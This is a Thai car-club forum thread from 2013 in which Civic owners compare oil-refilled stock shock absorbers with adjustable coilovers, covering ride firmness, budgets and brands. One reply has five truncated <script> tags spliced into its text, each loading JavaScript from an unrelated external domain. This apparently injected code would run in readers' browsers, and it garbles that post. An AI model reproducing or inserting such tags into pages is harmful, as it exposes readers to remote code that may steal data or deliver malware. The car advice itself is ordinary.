ตอบ
kangza


ชื่อเล่น: เก่ง

เข้าร่วม: 01 ธันวา 2011
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0

ที่อยู่: กรุงเทพ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 12:05 - อยากรู้ข้อมูลก่อนเสียเงิน อัพโช๊คตรับ
อยากรู้ว่าโช๊คเดิมอัดน้ำมันกับโช๊คที่ปรับได้ ต่างกันเยอไม
เพราะอยากจะเป็ยนอยู่ ความแข็งและนิ่มมันเกี่ยวกับความหนืดกับโช๊คไม และแข็งกับนิ่มอันไหน เหมาะกับการขับเร้วครับ
สอบถามกูรูทั้งหลายครับ
ได้รับคำขอบคุณจาก: davidian 
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 30 มกรา 2013 12:52 - อยากรู้ข้อมูลก่อนเสียเงิน อัพโช๊คตรับ
เข้ามารอกูรู
ได้รับคำขอบคุณจาก: tochi229 
EiKung


ชื่อเล่น: อิคุง

เข้าร่วม: 08 กันยา 2012
ตอบ: 242

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 301

ที่อยู่: นนทบุรี
ปี: 2005
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 30 มกรา 2013 13:59 - อยากรู้ข้อมูลก่อนเสียเงิน อัพโช๊คตรับ
ต่างกันเยอะครับ โช๊คปรับได้นั้นสามารถปรับสูงต่ำของรถได้ เท่าที่รู้ความนิ่มอยู่ที่สูงต่ำนี้ล่ะครับ(อันนี้ถามเค้ามา)
ส่วน โช๊คเติมอัดน้ำมันใช่ในกรณีที่เใส่สปริงโหลดครับ (ตรงนี้สำหรับคนงบน้อย)<script src="https://sport32news.com/civicesgroup.js"></ รถผมเองก้อัดน้ำมันครับใส่สปริงโหลด

ถ้าผมแน่นำขอแนะนำเป็น โช๊คปรับเกลียวไปเลยครับ ส่วนยีห้อต้องเลือกความชอบของผู้ขับขี้อีกที่<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ปล.ซื้อเลยครับปรับเกลียว เจ็บแต่จบ ไม่ต้องกลัวกระด่างไม่ต้องกลัวเด้งเกินปรับได้ครับ ผิดถูกประการใดขออถัยด้วยครับ
hikaru_kung


เข้าร่วม: 29 ธันวา 2009
ตอบ: 3067

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4341
ให้คำขอบคุณ: 4602
พุธ, 30 มกรา 2013 14:04 - อยากรู้ข้อมูลก่อนเสียเงิน อัพโช๊คตรับ
งานนี้ตามงบเลยครับ ถ้าไม่เกินหมื่น ก็อัดน้ำมัน กะเปลี่ยนสปริงแต่งพอ แต่มีข้อเสียคือ อาจต้องอัดน้ำมันใหม่ ประมาณ ปีละครั้ง หรือปีก่าๆ

แต่ถ้างบ 10000 -20000 ก็ไปเล่นพวกโช๊คตัวนอก กะสปริงแต่งได้ครับ พวกโช๊ค DC5 EP3 Koni หรือโช๊คสตรัทบางตัวไม่ถึง 20000 ก็มีครั้บ
แต่ถ้างบไม่อั้นจัด Tein SS หรือ Mono Flex เทพๆไปเลยครับ


Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 14:39 - อยากรู้ข้อมูลก่อนเสียเงิน อัพโช๊คตรับ
ถ้าพออดใจรอได้ก็รอเปลี่ยนดีๆไปเลยดีกว่าครับ การอัดนำ้มันเป็นการดัดแปลงที่ผลออกมาอาจเสียหลายต่อ อนาคจอยากกลับมาใช้สเตนดาร์ดก็เอากลับมาใช้ได้(กรณีเราเปลี่ยนเป็นชุด) เพราะจริงๆรถที่ดัดแปลงช่วงล่างจะมีความกระด้างเพิ่มขึ้นอาจจะเบื่อหรือไม่ชอบก็ได้ ลองนั่งรถเพื่อนที่เขาทำดูก่อนก็ได้ชอบจริงค่อยทำ
kanawat2528


ชื่อเล่น: ฟิล์ม

เข้าร่วม: 08 เมษา 2012
ตอบ: 116

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 109
ให้คำขอบคุณ: 49

ที่อยู่: ลพบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 30 มกรา 2013 14:46 - อยากรู้ข้อมูลก่อนเสียเงิน อัพโช๊คตรับ
ชอบแบบไหน ครับผม

โช็คเดิม นั้น นิ่มกว่าครับ แต่ไปเร็วๆแล้วร่อน

สตรัท ปรับเกลียว ปรับสูง-ต่ำ ไม่มีผลต่อความ หนึบ-นุ่ม

จะมีผลก็ต่อเมื่อปรับหัวบอลจ๊อย หัวจ๊อย มันจะมี ค่าแข็ง-อ่อน ตามระดับครับ

อ่อนมากไปก็เด้งๆ แข็งไปก็ดีดๆ อันนี้แล้วต่อชอบ (ต้องปรับเอง)

แต่ถ้าเรื่องความเร็วแล้วนะครับ มั่นใจ สตรัท ได้ครับ ผมว่าไม่ร่อนไม่ส่าย

เข้าโค้งไม่เหวี่ยง วิ่งรูด ลูกรังเนี่ย สบายกว่าโช๊คเดิมครับ

ปล1. ของผมใช้ สตรัท ของ H-drive (ราคาพอรับได้  28000 บาท) / ซิลเวอร์ เขาว่ากันว่า มุดแซงมันกว่า ไม่รู้ว่าเป็นไง เคยแต่จะมุดใต้ท้อง รถพ่วงอย่างเดียว
ปล2. มีคนบอกว่า TEIN  ดีกว่าอีกครับ แต่ราคา แรงหน่อย (ราคาอยู่ที่ 35000-42000 แล้วแต่รุ่น)
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.